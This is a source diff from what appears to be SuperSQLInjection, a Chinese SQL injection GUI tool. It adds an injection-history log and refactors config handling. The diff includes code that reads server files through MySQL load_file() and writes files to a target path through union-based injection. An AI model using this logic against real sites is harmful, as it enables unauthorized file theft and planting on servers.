delegatelogInject(logInjectTolvw), config); + XML.saveConfig(config.saveConfigpath, config); + } + catch (Exception e) { + this.Invoke(new showLogDelegate(log), "记录注入日志发生异常!" + e.Message, LogLevel.waring); + } + } + delegate void delegatelogInject(Config config); + + public void logInjectTolvw(Config config){ + ListViewItem lvw = new ListViewItem(config.domain); + lvw.Tag = config.saveConfigpath; + lvw.SubItems.Add(config.port+""); + lvw.SubItems.Add(config.uri); + lvw.SubItems.Add(config.pname); + lvw.SubItems.Add(config.injectType.ToString()); + lvw.SubItems.Add(config.dbType.ToString()); + lvw.SubItems.Add(config.testPayload); + lvw.SubItems.Add(DateTime.Now.ToString()); + + this.lvw_injectLog.Items.Add(lvw); + } + public void selectInjectType(int index) { this.cbox_basic_injectType.SelectedIndex = index; @@ -5170,28 +5207,7 @@ namespace SuperSQLInjection private void cbox_basic_dbType_SelectedIndexChanged(object sender, EventArgs e) { - switch (this.cbox_basic_dbType.SelectedIndex) - { - - case 0: - config.dbType = DBType.UnKnow; - break; - case 1: - config.dbType = DBType.Access; - break; - case 2: - config.dbType = DBType.MySQL5; - break; - case 3: - config.dbType = DBType.SQLServer; - break; - case 4: - config.dbType = DBType.Oracle; - break; - case 5: - config.dbType = DBType.MySQL4; - break; - } + config.dbType = (DBType)this.cbox_basic_dbType.SelectedIndex; } private void txt_inject_unionColumnsCount_TextChanged(object sender, EventArgs e) { @@ -5235,7 +5251,6 @@ namespace SuperSQLInjection try { XML.saveConfig("lastConfig.xml", this.config); - } catch (Exception ex) { @@ -5472,79 +5487,20 @@ namespace SuperSQLInjection this.cbox_basic_timeOut.Text = config.timeOut + ""; this.cbox_basic_encoding.Text = config.encoding; this.chk_sencondInject.Checked = config.sencondInject; - switch (config.injectType) - { - - case InjectType.UnKnow: - this.cbox_basic_injectType.SelectedIndex = 0; - break; - case InjectType.Bool: - this.cbox_basic_injectType.SelectedIndex = 1; - break; - case InjectType.Error: - this.cbox_basic_injectType.SelectedIndex = 2; - break; - case InjectType.Union: - this.cbox_basic_injectType.SelectedIndex = 3; - break; - - } - switch (config.dbType) - { - - case DBType.UnKnow: - this.cbox_basic_dbType.SelectedIndex = 0; - break; - case DBType.Access: - this.cbox_basic_dbType.SelectedIndex = 1; - break; - case DBType.MySQL5: - this.cbox_basic_dbType.SelectedIndex = 2; - break; - case DBType.SQLServer: - this.cbox_basic_dbType.SelectedIndex = 3; - break; - case DBType.Oracle: - this.cbox_basic_dbType.SelectedIndex = 4; - break; - case DBType.MySQL4: - this.cbox_basic_dbType.SelectedIndex = 5; - break; - } + this.cbox_basic_injectType.SelectedIndex = (int)config.injectType; + this.cbox_basic_dbType.SelectedIndex = (int)(config.dbType); + this.data_dbs_cob_db_encoding.Text = config.db_encoding; this.cbox_basic_threadSize.Text = config.threadSize + ""; this.cbox_basic_reTryCount.Text = config.reTry + ""; this.txt_inject_key.Text = config.key; this.chk_inject_foward_302.Checked = config.is_foward_302; this.chk_inject_reverseKey.Checked = config.reverseKey; + this.cbox_inject_type.SelectedIndex = (int)(config.keyType); - - switch (config.keyType) + if (config.keyType.Equals(KeyType.Time)) { - - case KeyType.Key: - this.cbox_inject_type.SelectedIndex = 0; - break; - case KeyType.Reg: - this.cbox_inject_type.SelectedIndex = 1; - break; - case KeyType.Code: - this.cbox_inject_type.SelectedIndex = 2; - break; - case KeyType.Time: - this.cbox_inject_type.SelectedIndex = 3; - config.maxTime = Tools.convertToInt(config.key); - break; - case KeyType.EQLen: - this.cbox_inject_type.SelectedIndex = 4; - break; - case KeyType.MinLen: - this.cbox_inject_type.SelectedIndex = 5; - break; - case KeyType.MaxLen: - this.cbox_inject_type.SelectedIndex = 6; - break; - + config.maxTime = Tools.convertToInt(config.key); } this.chk_openURLEncoding.Checked = config.isOpenURLEncoding; @@ -5677,9 +5633,8 @@ namespace SuperSQLInjection if (saveFileDialog.ShowDialog() == DialogResult.OK) { XML.saveConfig(saveFileDialog.FileName, config); + MessageBox.Show("导出成功!"); } - - MessageBox.Show("导出成功!"); } private void tsmi_update_Click(object sender, EventArgs e) @@ -5766,7 +5721,7 @@ namespace SuperSQLInjection } if (this.file_cbox_readWrite.SelectedIndex == 0) { - data_payload = MySQL5.hex.Replace("{data}", "load_file(" + path_16 + ")"); + data_payload = MySQL.hex.Replace("{data}", "load_file(" + path_16 + ")"); switch (config.injectType) { case InjectType.Bool: @@ -5777,7 +5732,7 @@ namespace SuperSQLInjection MessageBox.Show("大侠,请在注入中心,配置Bool盲注的判断值!"); return; } - String payload_len = MySQL5.ver_length.Replace("{data}", data_payload); + String payload_len = MySQL.ver_length.Replace("{data}", data_payload); int len = getValueByStepUp(payload_len, 0, 50000); this.dataCount = len; String value = ""; @@ -5811,7 +5766,7 @@ namespace SuperSQLInjection return; } - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", MySQL5.creatMySQLReadFileByUnion(config.columnsCount, config.showColumn, config.unionFill, "convert(load_file(" + path_16 + ") using UTF8)"))); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", MySQL.creatMySQLReadFileByUnion(config.columnsCount, config.showColumn, config.unionFill, "convert(load_file(" + path_16 + ") using UTF8)"))); this.dataCount = result.Length; this.currentDataCount = result.Length; this.Invoke(new StringDelegate(file_txt_resultSetText), result); @@ -5825,8 +5780,8 @@ namespace SuperSQLInjection case InjectType.Error: try { - String payload_len = MySQL5.char_length.Replace("{data}", data_payload); - String payload_len_error = MySQL5.error_value.Replace("{data}", MySQL5.creatMySQLColumnStr(payload_len)); + String payload_len = MySQL.char_length.Replace("{data}", data_payload); + String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.creatMySQLColumnStr(payload_len)); String result_length = getOneDataByUnionOrError(payload_len_error); @@ -5842,8 +5797,8 @@ namespace SuperSQLInjection while (start < sumlen) { //hex编码,防止中文等乱码 - String datas_value_tmp = ByPassForBetween(MySQL5.creatMySQLColumnStr(MySQL5.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count); - String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_tmp); + String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count); + String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_tmp); result += getOneDataByUnionOrError(c_datas_value_payload); start += count; this.currentDataCount = result.Length; @@ -5875,7 +5830,7 @@ namespace SuperSQLInjection { if (!String.IsNullOrEmpty(this.file_txt_result.Text)) { - String payload = MySQL5.creatMySQLWriteFileByUnion(config.columnsCount, config.showColumn, config.unionFill, path, this.file_txt_result.Text); + String payload = MySQL.creatMySQLWriteFileByUnion(config.columnsCount, config.showColumn, config.unionFill, path, this.file_txt_result.Text); HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet); MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!"); } @@ -6005,7 +5960,7 @@ namespace SuperSQLInjection { String[] ps = param.ToString().Split('#'); int index = int.Parse(ps[1].ToString()); - String tmp_va_payload = MySQL5.ver_value.Replace("{data}", ps[0]).Replace("{index}", (index + 1) + ""); + String tmp_va_payload = MySQL.ver_value.Replace("{data}", ps[0]).Replace("{index}", (index + 1) + ""); //数字加大写字母的ascii码 int ascii = getValue(tmp_va_payload, 48, 90); ver_tmp[index] = ((char)ascii).ToString(); @@ -6193,7 +6148,7 @@ namespace SuperSQLInjection { if (status == 0) { - if (config.dbType.Equals(DBType.MySQL5) || config.dbType.Equals(DBType.SQLServer)) + if (config.dbType.Equals(DBType.MySQL) || config.dbType.Equals(DBType.SQLServer)) { if (String.IsNullOrEmpty(this.file_txt_filePath.Text)) { @@ -7468,32 +7423,7 @@ namespace SuperSQLInjection private void cbox_inject_type_SelectedIndexChanged(object sender, EventArgs e) { int c = this.cbox_inject_type.SelectedIndex; - switch (c) - { - case 0: - config.keyType = KeyType.Key; - break; - case 1: - config.keyType = KeyType.Reg; - break; - - case 2: - config.keyType = KeyType.Code; - break; - case 3: - config.keyType = KeyType.Time; - break; - case 4: - config.keyType = KeyType.EQLen; - break; - case 5: - config.keyType = KeyType.MaxLen; - break; - case 6: - config.keyType = KeyType.MinLen; - break; - - } + config.keyType = (KeyType)c; } private void tsmi_createGetTemplate_Click(object sender, EventArgs e) @@ -7791,30 +7721,52 @@ namespace SuperSQLInjection } } } - private void readData(Object osockt) + + private void bypass_chk_useLike_CheckedChanged(object sender, EventArgs e) { - this.Invoke(new showLogDelegate(log), "接受数据", LogLevel.info); - Socket socket = (Socket)osockt; - - byte[] data = new byte[1024 * 1024]; - //侦听端口号 - String ctmp = ""; - int sum = 0; - do - { - - int len = socket.Receive(data,sum, 1024, SocketFlags.None); - if (len > 0) - { - sum += len; - } - ctmp = Encoding.UTF8.GetString(data); - - } while ((ctmp.IndexOf("\r\n\r\n") == -1)); - this.Invoke(new showLogDelegate(log), ctmp, LogLevel.info); - - + config.useLike = this.bypass_chk_useLike.Checked; + } + + private void tsmi_injectLog_clearAllLog_Click(object sender, EventArgs e) + { + this.lvw_injectLog.Items.Clear(); + Tools.delAllFiles(AppDomain.CurrentDomain.BaseDirectory+ "/logs/injection/"); + MessageBox.Show("记录已经清空!"); + } + + private void tsmi_injectLog_useCLog_Click(object sender, EventArgs e) + { + if (this.lvw_injectLog.SelectedItems.Count > 0) + { + try + { + this.config = XML.readConfig(this.lvw_injectLog.SelectedItems[0].Tag.ToString()); + reloadConfig(this.config); + MessageBox.Show("加载注入记录成功!"); + } + catch (Exception ep) { + log("加载注入记录失败!--"+ep.Message, LogLevel.waring); + } + } + } + + private void tsmi_injectLog_delSLog_Click(object sender, EventArgs e) + { + if (this.lvw_injectLog.SelectedItems.Count > 0) + { + try + { + foreach (ListViewItem lvw in this.lvw_injectLog.SelectedItems) { + Tools.delFile(lvw.Tag.ToString()); + } + this.lvw_injectLog.Items.Remove(this.lvw_injectLog.SelectedItems[0]); + MessageBox.Show("删除选择记录成功!"); + } + catch (Exception ep) + { + log("删除选择记录失败!--" + ep.Message, LogLevel.waring); + } + } } - } } \ No newline at end of file diff --git a/SuperSQLInjection/Main.resx b/SuperSQLInjection/Main.resx index 964c938..221bb67 100644 --- a/SuperSQLInjection/Main.resx +++ b/SuperSQLInjection/Main.resx @@ -118,20 +118,180 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - 142, 6 + 329, 17 - 9, 6 + 182, 17 + + + 477, 17 + + + 17, 55 + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + 613, 17 + + + 388, 55 + + + + AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w + LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 + ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq + DQAAAk1TRnQBSQFMAgEBBwEAAfABBgHwAQYBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA + AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 + AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA + AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm + AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM + AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA + ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz + AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ + AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM + AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA + AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA + AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ + AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/ + AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA + AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm + ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ + Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz + AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA + AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM + AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM + ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM + Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA + AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM + AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ + AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz + AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm + AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw + AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA + AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4 + AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX + AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI + AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc + Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc + Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv + Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX + AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ + C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW + AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D + ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/ + ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/ + AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc + AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8 + AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc + AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw + AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/ + AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA + DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/ + AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/ + AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0 + ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ + AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/ + AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs + Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA + A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA + AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA + AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA + AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA + AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs= + + + + 278, 55 + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + 538, 55 - 531, 14 + 747, 17 AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAAC - EwAAAk1TRnQBSQFMAgEBCgEAAUgBBwFIAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + EwAAAk1TRnQBSQFMAgEBCgEAAXABBwFwAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA @@ -215,168 +375,8 @@ BP8BwAEAAfwBPws= - - 279, 9 - - - 1218, 14 - - - 157, 52 - - - - - 